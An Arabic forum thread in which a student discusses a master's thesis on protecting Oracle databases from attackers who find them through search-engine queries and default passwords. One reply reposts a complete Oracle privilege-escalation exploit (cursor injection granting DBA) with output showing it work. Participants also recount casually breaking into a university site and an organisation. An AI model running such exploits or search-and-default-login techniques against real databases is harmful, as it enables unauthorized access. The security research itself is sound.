samia بتاريخ: 5 مايو 2010 تقديم بلاغ مشاركة بتاريخ: 5 مايو 2010 السلام عليكم ورحمة الله وبركاته ارجو من الاخوه الزملاء ابداء ارائهم بخصوص رساله بحث بالماجستير والتى هى بعنوان Seuring oracle database from search engines attack الموضوع باختصار بيتكلم عن مخاطر محركات البحث فى الوصول الى قواعد البيانات اوراكل وبالتالى مهاجمتها وهّذا يتم من خلال الدخول الى محركات البحث واجراء البحث عن كلمات دلالية للدخول الى الداتابيز انجن (isqlplus) فيقوم الهاكر بكتابة urltitle:/isqlplus او كتابة tnsnames او كلمات اخرى للدخول الى قواعد البانات وباستخدام default username/password يمكن الدخول على النظام وهذا لايتم فى جميع الانظمه ولكن يتم فقط فى الانظمه التى لم يتم عمل حماية على قوعد البيانات الخاصه بها وللاسف هذه النسبة لست بقليل حيث اجتازت حوالى 40% وهذه نسبة ليست بهينه الموضوع بصراحه عجبنى من خلال تصفحى بالانترنت والبحث عن مواضيع تخص الاوراكل سيكورتى فوجدت هذه المقاله والتى هى بعنوان" Search engine used to attack database" ودا الرابط الخاص بالملف ال بيشرحه http://www.itsec.gov.cn/docs/2009050...25368.pdf ويوجد اخرى للاختراق من خلال محركات البحث مثل Default Passwords .Easily-guessed Passwords .Misconfigurations Excessive PrivilegesNo Listener Password .Denial of Services (DoS) & Buffer Overflows.SQL injectionونزلت مقالات كثيره بخصوص هذا الموضوع ارجو من الاخوه الزملاء ابداء ارائهم واقتراحاتهم بخصوص هذا الموضوع وهل لى ان ادعم هذه الرسالة بمشروع عملى ام لاارجو ان لا تبخلو على بأرائكم فهى تهمنى اشكركم اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
samia بتاريخ: 5 مايو 2010 كاتب الموضوع تقديم بلاغ مشاركة بتاريخ: 5 مايو 2010 اين الرد يا شبابيا عملاقة الاوراكل اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
Guest عادل الشهري بتاريخ: 5 مايو 2010 تقديم بلاغ مشاركة بتاريخ: 5 مايو 2010 السلام عليكم قد يكون من أسباب تأخر الرد عدم كتابة عنوان واضح للمشاركة تم تعديل العنوان ونتمنى لك التوفيق .... اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
samia بتاريخ: 5 مايو 2010 كاتب الموضوع تقديم بلاغ مشاركة بتاريخ: 5 مايو 2010 اشكرك اخى عادل الشهرى عن هذا التوضيح اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
zezo_isl بتاريخ: 5 مايو 2010 تقديم بلاغ مشاركة بتاريخ: 5 مايو 2010 This is slightly modified version of: http://milw0rm.com/exploits/7677This is based on cursor injection and does not need create function privileges:DECLARED NUMBER;BEGIND := DBMS_SQL.OPEN_CURSOR;DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');end;#-----------screen dump---------------------------------------------------#SQL> select * from user_role_privs;USERNAME GRANTED_ROLE ADM DEF OS_------------------------------ ------------------------------ --- --- ---SCOTT CONNECT NO YES NOSCOTT EXECUTE_CATALOG_ROLE NO YES NOSCOTT RESOURCE NO YES NOSQL> DECLARE 2 D NUMBER; 3 BEGIN 4 D := DBMS_SQL.OPEN_CURSOR; 5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0); 6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); 7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); 8 end; 9 10 11 /DECLARE*ERROR at line 1:ORA-01403: no data foundORA-06512: at "SYS.LT", line 6118ORA-06512: at "SYS.LT", line 6087ORA-06512: at line 7SQL> select * from user_role_privs;USERNAME GRANTED_ROLE ADM DEF OS_------------------------------ ------------------------------ --- --- ---SCOTT CONNECT NO YES NOSCOTT DBA NO YES NOSCOTT EXECUTE_CATALOG_ROLE NO YES NOSCOTT RESOURCE NO YES NOSidwww.notsosecure.com# milw0rm.com [2009-07-02] اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
samia بتاريخ: 6 مايو 2010 كاتب الموضوع تقديم بلاغ مشاركة بتاريخ: 6 مايو 2010 أخى zezo_isl ممكن توضح ماذا نعنى بمجموعة هذه الاسطر اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
samia بتاريخ: 6 مايو 2010 كاتب الموضوع تقديم بلاغ مشاركة بتاريخ: 6 مايو 2010 اين مشاركة الاعضاء اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
zezo_isl بتاريخ: 6 مايو 2010 تقديم بلاغ مشاركة بتاريخ: 6 مايو 2010 سلام عليكم انا لست خبير فى نظام الحماية ولكن وجد معلومة عن SQL injection هذه السطور مثال عليها فى المشاركة السابقة - وكان من فترة وجد سطر sql على النت تضعة فى شريط البحث بجوجل يظهر لى تصميم القاعدة البيانات بعض المواقع عشوائى وسجلات الجداول وكلامات السر وكان ايامها دخلت على موقع كلية حاسبات جامعة عين شمس ولكن لاسف فقدت السطر ولكن الذى اتذكرة كان يعتمد على default username/password اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
samia بتاريخ: 7 مايو 2010 كاتب الموضوع تقديم بلاغ مشاركة بتاريخ: 7 مايو 2010 شكرا لك اخى zezo_isl على ردك وتفاعلك وبالفعل هذا ما اقوم بعمل الماستر فيه هو خطوره محركات البحث فى الدخول على قواعد البيانات فانا اتذكر ايضا زميل دخل على منظمه قويه باستخدام الديفلولت اكونت ارجو تفاعل الناس بخصوص هذا الموضوع اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
samia بتاريخ: 7 مايو 2010 كاتب الموضوع تقديم بلاغ مشاركة بتاريخ: 7 مايو 2010 اين الردود والتفاعلات اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
samia بتاريخ: 15 مايو 2010 كاتب الموضوع تقديم بلاغ مشاركة بتاريخ: 15 مايو 2010 نرجو مشاركة الاعضاء اقتباس رابط هذا التعليق شارك المزيد من خيارات المشاركة
Recommended Posts
انضم إلى المناقشة
يمكنك المشاركة الآن والتسجيل لاحقاً. إذا كان لديك حساب, سجل دخولك الآن لتقوم بالمشاركة من خلال حسابك.